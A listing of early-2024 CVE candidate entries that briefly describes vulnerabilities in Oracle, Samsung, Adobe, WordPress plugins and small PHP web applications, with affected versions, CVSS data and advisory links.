CVE 2024 20905 Candidate Vulnerability in the JD Edwards EnterpriseOne Tools product of Oracle JD Edwards (component: Enterprise Infrastructure SEC). Supported versions that are affected are Prior to 9.2.8.0. Easily exploitable vulnerability allows high privileged attacker with network access via JDENET to compromise JD Edwards EnterpriseOne Tools. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of JD Edwards EnterpriseOne Tools. CVSS 3.1 Base Score 2.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20904 Candidate Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Pod Admin). Supported versions that are affected are 6.4.0.0.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. While the vulnerability is in Oracle Business Intelligence Enterprise Edition, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 5.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20903 Candidate Vulnerability in the Java VM component of Oracle Database Server. Supported versions that are affected are 19.3-19.21 and 21.3-21.12. Easily exploitable vulnerability allows low privileged attacker having Create Session, Create Procedure privilege with network access via Oracle Net to compromise Java VM. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java VM accessible data. CVSS 3.1 Base Score 6.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20841 Candidate Improper Handling of Insufficient Privileges in Samsung Account prior to version 14.8.00.3 allows local attackers to access data. MISC:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=03 | URL:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=03 Assigned (20231205)
CVE 2024 20840 Candidate Improper access control in Samsung Voice Recorder prior to versions 21.5.16.01 in Android 12 and Android 13, 21.4.51.02 in Android 14 allows physical attackers using hardware keyboard to use VoiceRecorder on the lock screen. MISC:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=03 | URL:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=03 Assigned (20231205)
CVE 2024 20839 Candidate Improper access control in Samsung Voice Recorder prior to versions 21.5.16.01 in Android 12 and Android 13, 21.4.51.02 in Android 14 allows physical attackers to access recording files on the lock screen. MISC:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=03 | URL:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=03 Assigned (20231205)
CVE 2024 20838 Candidate Improper validation vulnerability in Samsung Internet prior to version 24.0.3.2 allows local attackers to execute arbitrary code. MISC:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=03 | URL:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=03 Assigned (20231205)
CVE 2024 20837 Candidate Improper handling of granting permission for Trusted Web Activities in Samsung Internet prior to version 24.0.0.41 allows local attackers to grant permission to their own TWA WebApps without user interaction. MISC:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=03 | URL:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=03 Assigned (20231205)
CVE 2024 20836 Candidate Out of bounds Read vulnerability in ssmis_get_frm in libsubextractor.so prior to SMR Mar-2024 Release 1 allows local attackers to read out of bounds memory. MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=03 | URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=03 Assigned (20231205)
CVE 2024 20835 Candidate Improper access control vulnerability in CustomFrequencyManagerService prior to SMR Mar-2024 Release 1 allows local attackers to execute privileged behaviors. MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=03 | URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=03 Assigned (20231205)
CVE 2024 20834 Candidate The sensitive information exposure vulnerability in WlanTest prior to SMR Mar-2024 Release 1 allows local attackers to access MAC address without proper permission. MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=03 | URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=03 Assigned (20231205)
CVE 2024 20833 Candidate Use after free vulnerability in pub_crypto_recv_msg prior to SMR Mar-2024 Release 1 due to race condition allows local attackers with system privilege to cause memory corruption. MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=03 | URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=03 Assigned (20231205)
CVE 2024 20832 Candidate Heap overflow in Little Kernel in bootloader prior to SMR Mar-2024 Release 1 allows a privileged attacker to execute arbitrary code. MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=03 | URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=03 Assigned (20231205)
CVE 2024 20831 Candidate Stack overflow in Little Kernel in bootloader prior to SMR Mar-2024 Release 1 allows a privileged attackers to execute arbitrary code. MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=03 | URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=03 Assigned (20231205)
CVE 2024 20830 Candidate Incorrect default permission in AppLock prior to SMR MAr-2024 Release 1 allows local attackers to configure AppLock settings. MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=03 | URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=03 Assigned (20231205)
CVE 2024 20829 Candidate Missing proper interaction for opening deeplink in Samsung Internet prior to version v24.0.0.0 allows remote attackers to open an application without proper interaction. MISC:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=03 | URL:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=03 Assigned (20231205)
CVE 2024 20828 Candidate Improper authorization verification vulnerability in Samsung Internet prior to version 24.0 allows physical attackers to access files downloaded in SecretMode without proper authentication. MISC:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02 | URL:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02 Assigned (20231205)
CVE 2024 20827 Candidate Improper access control vulnerability in Samsung Gallery prior to version 14.5.04.4 allows physical attackers to access the picture using physical keyboard on the lockscreen. MISC:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02 | URL:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02 Assigned (20231205)
CVE 2024 20826 Candidate Implicit intent hijacking vulnerability in UPHelper library prior to version 4.0.0 allows local attackers to access sensitive information via implicit intent. MISC:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02 | URL:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02 Assigned (20231205)
CVE 2024 20825 Candidate Implicit intent hijacking vulnerability in IAP of Galaxy Store prior to version 4.5.63.6 allows local attackers to access sensitive information via implicit intent. MISC:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02 | URL:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02 Assigned (20231205)
CVE 2024 20824 Candidate Implicit intent hijacking vulnerability in VoiceSearch of Galaxy Store prior to version 4.5.63.6 allows local attackers to access sensitive information via implicit intent. MISC:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02 | URL:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02 Assigned (20231205)
CVE 2024 20823 Candidate Implicit intent hijacking vulnerability in SamsungAccount of Galaxy Store prior to version 4.5.63.6 allows local attackers to access sensitive information via implicit intent. MISC:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02 | URL:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02 Assigned (20231205)
CVE 2024 20822 Candidate Implicit intent hijacking vulnerability in AccountActivity of Galaxy Store prior to version 4.5.63.6 allows local attackers to access sensitive information via implicit intent. MISC:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02 | URL:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02 Assigned (20231205)
CVE 2024 20820 Candidate Improper input validation in bootloader prior to SMR Feb-2024 Release 1 allows attacker to cause an Out-Of-Bounds read. MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02 | URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02 Assigned (20231205)
CVE 2024 20819 Candidate Out-of-bounds Write vulnerabilities in svc1td_vld_plh_ap of libsthmbc.so prior to SMR Feb-2024 Release 1 allows local attackers to trigger buffer overflow. MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02 | URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02 Assigned (20231205)
CVE 2024 20818 Candidate Out-of-bounds Write vulnerabilities in svc1td_vld_elh of libsthmbc.so prior to SMR Feb-2024 Release 1 allows local attackers to trigger buffer overflow. MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02 | URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02 Assigned (20231205)
CVE 2024 20817 Candidate Out-of-bounds Write vulnerabilities in svc1td_vld_slh of libsthmbc.so prior to SMR Feb-2024 Release 1 allows local attackers to trigger buffer overflow. MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02 | URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02 Assigned (20231205)
CVE 2024 20816 Candidate Improper authentication vulnerability in onCharacteristicWriteRequest in Auto Hotspot prior to SMR Feb-2024 Release 1 allows adjacent attackers connect to victim's mobile hotspot without user awareness. MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02 | URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02 Assigned (20231205)
CVE 2024 20815 Candidate Improper authentication vulnerability in onCharacteristicReadRequest in Auto Hotspot prior to SMR Feb-2024 Release 1 allows adjacent attackers connect to victim's mobile hotspot without user awareness. MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02 | URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02 Assigned (20231205)
CVE 2024 20814 Candidate Out-of-bounds Read in padmd_vld_ac_prog_refine of libpadm.so prior to SMR Feb-2024 Release 1 allows attacker access unauthorized information. MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02 | URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02 Assigned (20231205)
CVE 2024 20813 Candidate Out-of-bounds Write in padmd_vld_qtbl of libpadm.so prior to SMR Feb-2024 Release 1 allows local attacker to execute arbitrary code. MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02 | URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02 Assigned (20231205)
CVE 2024 20812 Candidate Out-of-bounds Write in padmd_vld_htbl of libpadm.so prior to SMR Feb-2024 Release 1 allows local attacker to execute arbitrary code. MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02 | URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02 Assigned (20231205)
CVE 2024 20811 Candidate Improper caller verification in GameOptimizer prior to SMR Feb-2024 Release 1 allows local attackers to configure GameOptimizer. MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02 | URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02 Assigned (20231205)
CVE 2024 20810 Candidate Implicit intent hijacking vulnerability in Smart Suggestions prior to SMR Feb-2024 Release 1 allows attackers to get sensitive information. MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02 | URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02 Assigned (20231205)
CVE 2024 20809 Candidate Improper access control vulnerability in Nearby device scanning prior version 11.1.14.7 allows local attacker to access data. MISC:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=01 | URL:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=01 Assigned (20231205)
CVE 2024 20807 Candidate Implicit intent hijacking vulnerability in Samsung Email prior to version 6.1.90.16 allows attacker to get sensitive information. MISC:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=01 | URL:https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=01 Assigned (20231205)
CVE 2024 20806 Candidate Improper access control in Notification service prior to SMR Jan-2024 Release 1 allows local attacker to access notification data. MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=01 | URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=01 Assigned (20231205)
CVE 2024 20805 Candidate Path traversal vulnerability in ZipCompressor of MyFiles prior to SMR Jan-2024 Release 1 in Android 11 and Android 12, and version 14.5.00.21 in Android 13 allows attackers to write arbitrary file. MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=01 | URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=01 Assigned (20231205)
CVE 2024 20804 Candidate Path traversal vulnerability in FileUriConverter of MyFiles prior to SMR Jan-2024 Release 1 in Android 11 and Android 12, and version 14.5.00.21 in Android 13 allows attackers to write arbitrary file. MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=01 | URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=01 Assigned (20231205)
CVE 2024 20803 Candidate Improper authentication vulnerability in Bluetooth pairing process prior to SMR Jan-2024 Release 1 allows remote attackers to establish pairing process without user interaction. MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=01 | URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=01 Assigned (20231205)
CVE 2024 20802 Candidate Improper access control vulnerability in Samsung DeX prior to SMR Jan-2024 Release 1 allows owner to access other users' notification in a multi-user environment. MISC:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=01 | URL:https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=01 Assigned (20231205)
CVE 2024 2080 Candidate The LiquidPoll – Polls, Surveys, NPS and Feedback Reviews plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.3.76 via the poller_list shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to extract information from polls that may be private. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3054831%40wp-poll&new=3054831%40wp-poll&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3054831%40wp-poll&new=3054831%40wp-poll&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/84f57623-b6a6-4717-857d-93fa9d279882?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/84f57623-b6a6-4717-857d-93fa9d279882?source=cve Assigned (20240301)
CVE 2024 2079 Candidate The WPBakery Page Builder Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'per_line_mobile' shortcode in all versions up to, and including, 3.8.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3048239%40addons-for-visual-composer&new=3048239%40addons-for-visual-composer&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3048239%40addons-for-visual-composer&new=3048239%40addons-for-visual-composer&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/2c07b5c8-7fae-499d-9f6c-9392166f74b8?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/2c07b5c8-7fae-499d-9f6c-9392166f74b8?source=cve Assigned (20240301)
CVE 2024 2078 Candidate A Cross-Site Scripting (XSS) vulnerability has been found in HelpDeskZ affecting version 2.0.2 and earlier. This vulnerability could allow an attacker to send a specially crafted JavaScript payload within the email field and partially take control of an authenticated user's browser session. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-helpdeskz | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-helpdeskz Assigned (20240301)
CVE 2024 2077 Candidate A vulnerability classified as critical has been found in SourceCodester Simple Online Bidding System 1.0. This affects an unknown part of the file index.php. The manipulation of the argument category_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255393 was assigned to this vulnerability. MISC:VDB-255393 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255393 | MISC:VDB-255393 | SourceCodester Simple Online Bidding System index.php sql injection | URL:https://vuldb.com/?id.255393 | MISC:https://github.com/yethu123/vulns-finding/blob/main/Simple%20Online%20Bidding%20System.md | URL:https://github.com/yethu123/vulns-finding/blob/main/Simple%20Online%20Bidding%20System.md Assigned (20240301)
CVE 2024 20767 Candidate ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction. MISC:https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html | URL:https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html Assigned (20231204)
CVE 2024 20765 Candidate Acrobat Reader versions 20.005.30539, 23.008.20470 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. MISC:https://helpx.adobe.com/security/products/acrobat/apsb24-07.html | URL:https://helpx.adobe.com/security/products/acrobat/apsb24-07.html Assigned (20231204)
CVE 2024 20764 Candidate Animate versions 24.0, 23.0.3 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. MISC:https://helpx.adobe.com/security/products/animate/apsb24-19.html | URL:https://helpx.adobe.com/security/products/animate/apsb24-19.html Assigned (20231204)
CVE 2024 20761 Candidate Animate versions 24.0, 23.0.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. MISC:https://helpx.adobe.com/security/products/animate/apsb24-19.html | URL:https://helpx.adobe.com/security/products/animate/apsb24-19.html Assigned (20231204)
CVE 2024 2076 Candidate A vulnerability was found in CodeAstro House Rental Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file booking.php/owner.php/tenant.php. The manipulation leads to missing authentication. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255392. MISC:VDB-255392 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.255392 | MISC:VDB-255392 | CodeAstro House Rental Management System tenant.php missing authentication | URL:https://vuldb.com/?id.255392 | MISC:https://docs.qq.com/doc/DYlREVXpuRUFwRFpQ | URL:https://docs.qq.com/doc/DYlREVXpuRUFwRFpQ Assigned (20240301)
CVE 2024 20757 Candidate Bridge versions 13.0.5, 14.0.1 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. MISC:https://helpx.adobe.com/security/products/bridge/apsb24-15.html | URL:https://helpx.adobe.com/security/products/bridge/apsb24-15.html Assigned (20231204)
CVE 2024 20756 Candidate Bridge versions 13.0.5, 14.0.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. MISC:https://helpx.adobe.com/security/products/bridge/apsb24-15.html | URL:https://helpx.adobe.com/security/products/bridge/apsb24-15.html Assigned (20231204)
CVE 2024 20755 Candidate Bridge versions 13.0.5, 14.0.1 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. MISC:https://helpx.adobe.com/security/products/bridge/apsb24-15.html | URL:https://helpx.adobe.com/security/products/bridge/apsb24-15.html Assigned (20231204)
CVE 2024 20754 Candidate Lightroom Desktop versions 7.1.2 and earlier are affected by an Untrusted Search Path vulnerability that could result in arbitrary code execution in the context of the current user. If the application uses a search path to locate critical resources such as programs, then an attacker could modify that search path to point to a malicious program, which the targeted application would then execute. Exploitation of this issue requires user interaction in that a victim must open a malicious file. MISC:https://helpx.adobe.com/security/products/lightroom/apsb24-17.html | URL:https://helpx.adobe.com/security/products/lightroom/apsb24-17.html Assigned (20231204)
CVE 2024 20752 Candidate Bridge versions 13.0.5, 14.0.1 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. MISC:https://helpx.adobe.com/security/products/bridge/apsb24-15.html | URL:https://helpx.adobe.com/security/products/bridge/apsb24-15.html Assigned (20231204)
CVE 2024 20750 Candidate Substance3D - Designer versions 13.1.0 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. MISC:https://helpx.adobe.com/security/products/substance3d_designer/apsb24-13.html | URL:https://helpx.adobe.com/security/products/substance3d_designer/apsb24-13.html Assigned (20231204)
CVE 2024 2075 Candidate A vulnerability was found in SourceCodester Daily Habit Tracker 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /endpoint/update-tracker.php. The manipulation of the argument day leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255391. MISC:VDB-255391 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255391 | MISC:VDB-255391 | SourceCodester Daily Habit Tracker update-tracker.php cross site scripting | URL:https://vuldb.com/?id.255391 | MISC:https://github.com/vanitashtml/CVE-Dumps/blob/main/Stored%20XSS%20Daily%20Habit%20Tracker.md | URL:https://github.com/vanitashtml/CVE-Dumps/blob/main/Stored%20XSS%20Daily%20Habit%20Tracker.md Assigned (20240301)
CVE 2024 20749 Candidate Acrobat Reader versions 20.005.30539, 23.008.20470 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. MISC:https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1910 | MISC:https://helpx.adobe.com/security/products/acrobat/apsb24-07.html | URL:https://helpx.adobe.com/security/products/acrobat/apsb24-07.html Assigned (20231204)
CVE 2024 20746 Candidate Premiere Pro versions 24.1, 23.6.2 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. MISC:https://helpx.adobe.com/security/products/premiere_pro/apsb24-12.html | URL:https://helpx.adobe.com/security/products/premiere_pro/apsb24-12.html Assigned (20231204)
CVE 2024 20745 Candidate Premiere Pro versions 24.1, 23.6.2 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. MISC:https://helpx.adobe.com/security/products/premiere_pro/apsb24-12.html | URL:https://helpx.adobe.com/security/products/premiere_pro/apsb24-12.html Assigned (20231204)
CVE 2024 20744 Candidate Substance3D - Painter versions 9.1.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. MISC:https://helpx.adobe.com/security/products/substance3d_painter/apsb24-04.html | URL:https://helpx.adobe.com/security/products/substance3d_painter/apsb24-04.html Assigned (20231204)
CVE 2024 20742 Candidate Substance3D - Painter versions 9.1.1 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. MISC:https://helpx.adobe.com/security/products/substance3d_painter/apsb24-04.html | URL:https://helpx.adobe.com/security/products/substance3d_painter/apsb24-04.html Assigned (20231204)
CVE 2024 20741 Candidate Substance3D - Painter versions 9.1.1 and earlier are affected by a Write-what-where Condition vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. MISC:https://helpx.adobe.com/security/products/substance3d_painter/apsb24-04.html | URL:https://helpx.adobe.com/security/products/substance3d_painter/apsb24-04.html Assigned (20231204)
CVE 2024 2074 Candidate A vulnerability was found in Mini-Tmall up to 20231017 and classified as critical. This issue affects some unknown processing of the file ?r=tmall/admin/user/1/1. The manipulation of the argument orderBy leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255389 was assigned to this vulnerability. MISC:VDB-255389 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255389 | MISC:VDB-255389 | Mini-Tmall 1 sql injection | URL:https://vuldb.com/?id.255389 | MISC:https://github.com/yuziiiiiiiiii/CVE-SQL/blob/main/cve.md | URL:https://github.com/yuziiiiiiiiii/CVE-SQL/blob/main/cve.md Assigned (20240301)
CVE 2024 20739 Candidate Audition versions 24.0.3, 23.6.2 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. MISC:https://helpx.adobe.com/security/products/audition/apsb24-11.html | URL:https://helpx.adobe.com/security/products/audition/apsb24-11.html Assigned (20231204)
CVE 2024 20738 Candidate Adobe FrameMaker Publishing Server versions 2022.1 and earlier are affected by an Improper Authentication vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass authentication mechanisms and gain unauthorized access. Exploitation of this issue does not require user interaction. MISC:https://helpx.adobe.com/security/products/framemaker-publishing-server/apsb24-10.html | URL:https://helpx.adobe.com/security/products/framemaker-publishing-server/apsb24-10.html Assigned (20231204)
CVE 2024 20734 Candidate Acrobat Reader versions 20.005.30539, 23.008.20470 and earlier are affected by a Use After Free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. MISC:https://helpx.adobe.com/security/products/acrobat/apsb24-07.html | URL:https://helpx.adobe.com/security/products/acrobat/apsb24-07.html Assigned (20231204)
CVE 2024 20733 Candidate Acrobat Reader versions 20.005.30539, 23.008.20470 and earlier are affected by an Improper Input Validation vulnerability that could lead to an application denial-of-service. An attacker could leverage this vulnerability to cause the application to crash, resulting in a denial of service. Exploitation of this issue requires user interaction in that a victim must open a malicious file. MISC:https://helpx.adobe.com/security/products/acrobat/apsb24-07.html | URL:https://helpx.adobe.com/security/products/acrobat/apsb24-07.html Assigned (20231204)
CVE 2024 20730 Candidate Acrobat Reader versions 20.005.30539, 23.008.20470 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. MISC:https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1906 | MISC:https://helpx.adobe.com/security/products/acrobat/apsb24-07.html | URL:https://helpx.adobe.com/security/products/acrobat/apsb24-07.html Assigned (20231204)
CVE 2024 2073 Candidate A vulnerability has been found in SourceCodester Block Inserter for Dynamic Content 1.0 and classified as critical. This vulnerability affects unknown code of the file view_post.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255388. MISC:VDB-255388 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255388 | MISC:VDB-255388 | SourceCodester Block Inserter for Dynamic Content view_post.php sql injection | URL:https://vuldb.com/?id.255388 | MISC:https://github.com/vanitashtml/CVE-Dumps/blob/main/Block%20Inserter%20for%20Dynamic%20Content%20-%20Sql%20Injection.md | URL:https://github.com/vanitashtml/CVE-Dumps/blob/main/Block%20Inserter%20for%20Dynamic%20Content%20-%20Sql%20Injection.md Assigned (20240301)
CVE 2024 20728 Candidate Acrobat Reader versions 20.005.30539, 23.008.20470 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. MISC:https://helpx.adobe.com/security/products/acrobat/apsb24-07.html | URL:https://helpx.adobe.com/security/products/acrobat/apsb24-07.html Assigned (20231204)
CVE 2024 20725 Candidate Substance3D - Painter versions 9.1.1 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. MISC:https://helpx.adobe.com/security/products/substance3d_painter/apsb24-04.html | URL:https://helpx.adobe.com/security/products/substance3d_painter/apsb24-04.html Assigned (20231204)
CVE 2024 20723 Candidate Substance3D - Painter versions 9.1.1 and earlier are affected by a Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. MISC:https://helpx.adobe.com/security/products/substance3d_painter/apsb24-04.html | URL:https://helpx.adobe.com/security/products/substance3d_painter/apsb24-04.html Assigned (20231204)
